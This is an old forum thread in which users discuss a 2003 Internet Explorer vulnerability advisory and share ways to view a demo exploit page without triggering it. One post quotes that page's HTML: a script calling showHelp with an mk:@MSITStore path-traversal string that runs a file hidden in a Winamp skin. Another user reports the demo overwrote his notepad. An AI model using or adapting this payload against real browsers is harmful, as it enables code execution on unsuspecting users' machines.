Author | Message | Time |
---|---|---|
Thing | If you were a Microsoft programmer working on the IE team, would you admit it to your friends? http://www.securitytracker.com/alerts/2003/Dec/1008578.html This one is pretty fun. http://www.freewebs.com/arman2/showamp.htm Here is an example. | January 1, 2004, 2:28 PM |
iago | I can't even view its source the easy way :) | January 1, 2004, 2:56 PM |
MesiaH | use msinet, before i lost everything due to a reformat, i made a small program that uses inet to grab the source, and build a text-only display of the contents of a website, therefore, no popups or crashing, good for testing links and such... | January 1, 2004, 11:18 PM |
Kp | [quote author=MesiaH link=board=2;threadid=4549;start=0#msg37967 date=1072999094] use msinet, before i lost everything due to a reformat, i made a small program that uses inet to grab the source, and build a text-only display of the contents of a website, therefore, no popups or crashing, good for testing links and such... [/quote] Or you could use Lynx. :P | January 2, 2004, 12:05 AM |
iago | [quote author=Kp link=board=2;threadid=4549;start=0#msg37970 date=1073001913] [quote author=MesiaH link=board=2;threadid=4549;start=0#msg37967 date=1072999094] use msinet, before i lost everything due to a reformat, i made a small program that uses inet to grab the source, and build a text-only display of the contents of a website, therefore, no popups or crashing, good for testing links and such... [/quote] Or you could use Lynx. :P [/quote] I would just use telnet :/ | January 2, 2004, 12:49 AM |
warz | bleeeeh. | January 2, 2004, 1:34 AM |
Spht | I did View -> Source... | January 2, 2004, 2:25 AM |
UserLoser. | [quote author=Spht link=board=2;threadid=4549;start=0#msg37987 date=1073010305] I did View -> Source... [/quote] That wouldn't work for me - So i packet logged it, took source and stuck it at http://www.userloser.net/test.html - slightly modified ;D | January 2, 2004, 2:38 AM |
Kp | [quote author=iago link=board=2;threadid=4549;start=0#msg37973 date=1073004572]I would just use telnet :/[/quote] It's much easier to follow links in Lynx than in telnet though. :) | January 2, 2004, 3:26 AM |
Decimal. | I went to the example link that Thing provided and after viewing everything I don't have notepad anymore :-\. I think that one program overwrote my notepad program and now I don't have it... I need help to recover the real notepad. | January 2, 2004, 5:40 AM |
warz | delete bad notepad.exe and replace with real notepad.exe ? | January 2, 2004, 7:00 AM |
iago | [quote author=Kp link=board=2;threadid=4549;start=0#msg37994 date=1073013967] [quote author=iago link=board=2;threadid=4549;start=0#msg37973 date=1073004572]I would just use telnet :/[/quote] It's much easier to follow links in Lynx than in telnet though. :) [/quote] There aren't any links, I just wanted to view the source. | January 2, 2004, 10:49 AM |
Naem | why not just go to the main page, look at the link to go to the exploit page, and save the target to disk? worked for me. [code] <iframe src=xvulnx.wsz></iframe> <h1>Wait For 8 Seconds...</h1> <script> setTimeout( function () { showHelp("mk:@MSITStore:iexplore.chm::..\\..\\..\\..\\program files\\winamp\\skins\\xvulnx.wsz::\self-exec.html"); }, 8000 ); </script> [/code] | January 2, 2004, 4:57 PM |
Stealth | I opened it in the obviously-immune Mozilla Firebird and did View -> Page Source. | January 2, 2004, 5:58 PM |
Naem | [quote] Critical Updates and Service Packs Windows Update did not find any critical updates for your computer [/quote] I love microsoft | January 2, 2004, 6:04 PM |
Kp | [quote author=iago link=board=2;threadid=4549;start=0#msg3812 date=1073040584][quote author=Kp link=board=2;threadid=4549;start=0#msg37994 date=1073013967][quote author=iago link=board=2;threadid=4549;start=0#msg37973 date=1073004572]I would just use telnet :/[/quote]It's much easier to follow links in Lynx than in telnet though. :)[/quote]There aren't any links, I just wanted to view the source.[/quote] I was responding to Mesiah's comment about how to test pages/links without subjecting yourself to IE vulnerabilities in the process. For his case, it sounded like there would be links, in which case Lynx would be easier to use than telnet. | January 2, 2004, 6:13 PM |
iago | Ah, then life's good. Thought you were saying I should have used lynx. Incidently, does lynx have built-in support to view source? It's surprising if it doesn't, but is lynx open-source? | January 2, 2004, 7:36 PM |
Kp | [quote author=iago link=board=2;threadid=4549;start=15#msg38059 date=1073072178] Incidently, does lynx have built-in support to view source?[/quote] Backslash toggles between source and rendered view. (See Lynx keystroke help for a full listing.) | January 2, 2004, 8:29 PM |